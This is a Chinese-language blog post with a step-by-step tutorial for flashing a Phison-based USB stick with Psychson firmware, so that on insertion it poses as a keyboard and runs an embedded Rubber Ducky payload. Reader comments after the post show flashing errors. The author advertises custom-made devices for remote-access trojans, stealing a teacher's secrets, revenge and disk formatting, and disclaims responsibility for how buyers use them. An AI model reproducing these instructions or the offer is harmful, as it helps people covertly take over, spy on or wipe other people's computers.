利用U盘制作简单BadUSB,插谁谁怀孕,价格便宜,人人都可以拥有
时间:2016-4-1 13:34 作者:admin 分类: 技术文章
首先 来看一下 图(如果刷坏或者想更改Payload,需要短接39和40针,再用官方刷写工具刷新),注意红色箭头标志:
0x00 前言
关于Badusb可以参看这个视屏:http://v.qq.com/boke/page/l/g/w/l01425u2igw.html
不是很新的东西,其他作者已对此做过研究测试,本文仅用来记录操作过程,保存日志,说明细节。
0x01参考资料
https://github.com/adamcaudill/Psychson
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
http://zone.wooyun.org/content/20001
0x02环境搭建
1、硬件
U盘 :东芝(TOSHIBA) 速闪系列 U盘 16GB (黑色) USB3.0 主控版本:Phison 2251-03 购买地址: http://item.jd.com/929732.html
2、软件
Windows x64主机
(1)Java Runtime Environment :Java环境,用于支持Duckencoder
(2)SDCC :刷写U盘的环境,用于支持Psychson
(3)Visual Studio 2012 :编译Psychson的开发环境
(4)Psychson :BasUSB写入工具 (https://github.com/adamcaudill/Psychson)
(5)Burner File :BN03V104M.BIN,必要的burner
(6)USB-Rubber-Ducky Payload :编写Payload的参考代码 (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads)
(7)Duckencoder :用于编译Payload
(8)chipgenius 芯片检测工具 :用于确定U盘型号
0x03操作流程
1、配置Payload
进入DuckEncoder文件夹
执行:
java -jar encoder.jar -i payload.txt -o inject.bin
说明:
encoder.jar:文件夹自带 payload.txt:可参考USB-Rubber-Ducky Payload inject.bin:执行代码后生成的文件
2、生成固件
执行:
Psychson-master\firmware\build.bat
生成fw.bin文件
3、将Payload写入fw.bin文件
执行:
EmbedPayload.exe inject.bin fw.bin
说明:
EmbedPayload.exe:编译EmbedPayload工程得来
inject.bin:操作1生成
fw.bin:操作2生成
4、将生成的固件写入U盘
(1)执行
DriveCom.exe /drive=E /action=SetBootMode
设置U盘模式
(2)执行
DriveCom.exe /drive=E /action=SendExecutable /burner=BN03V104M.BIN
操作burner
(3)执行
DriveCom.exe /drive=E /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin
将fw.bin刷入U盘
0x04 小结
刷入成功后,下次插入U盘会模拟键盘操作,自动执行Payload
0x05 补充
如果刷坏或者想更改Payload,需要短接39和40针,再用官方刷写工具刷新
链接: http://pan.baidu.com/s/1jIm22bk 密码: mrxn
欢迎私聊博主个人定制哦!价格实惠,保你满意,远控女神?试卷?老师的秘密?报复?格盘?改后缀?木马?都可以!哈哈
我只负责制作,怎么用那是你的事儿!你也可以自己按照教程制作,喜欢折腾的慢慢折腾去吧!
标签: 攻击 渗透测试 隐私窃取 黑客工具 分享 badusb
推荐阅读:
Action specified: SendFirmware
Gathering information...
Reported chip type: 2307
Reported chip ID: 98-3A-98-A3-76-51
Reported firmware version: 1.03.10
Mode: Burner
Rebooting...
Sending firmware...
FATAL: System.InvalidOperationException: Header not accepted
在 DriveCom.PhisonDevice.TransferFile(Byte[] data, Byte header, Byte body)
在 DriveCom.Startup._RunFirmware(String fileName)
在 DriveCom.Startup._SendFirmware()
在 DriveCom.Startup.Main(String[] args)
楼主写入是出错 不知啥意思
执行:
Psychson-master\firmware\build.bat
生成fw.bin文件
这一步出错了
rmware\build.bat
*** Building main.c...
at 1: error 4: 'fopen' failed on file 'main.c'
*** There were errors! ***
*** Done.
提示这个,这个怎么搞?
C:\Users\Administrator>E:\1\firmware\build.bat
*** Building main.c...
at 1: error 4: 'fopen' failed on file 'main.c'
*** There were errors! ***
*** Done.
打开这个文件,sdcc也好了vs2012也好了,就是生成不了fw.bin文件,求助啊
FATAL: System.InvalidOperationException: DeviceIoControl failed: 0006
在 DriveCom.PhisonDevice._SendCommand(SafeFileHandle handle, Byte[] cmd, Byte
[] data, Int32 bytesExpected)
在 DriveCom.PhisonDevice.SendCommand(Byte[] cmd, Byte[] data)
在 DriveCom.PhisonDevice.TransferFile(Byte[] data, Byte header, Byte body)
在 DriveCom.PhisonDevice.TransferFile(Byte[] data)
在 DriveCom.Startup._ExecuteImage(String fileName)
在 DriveCom.Startup.Main(String[] args)
BURNER这一步报错 求解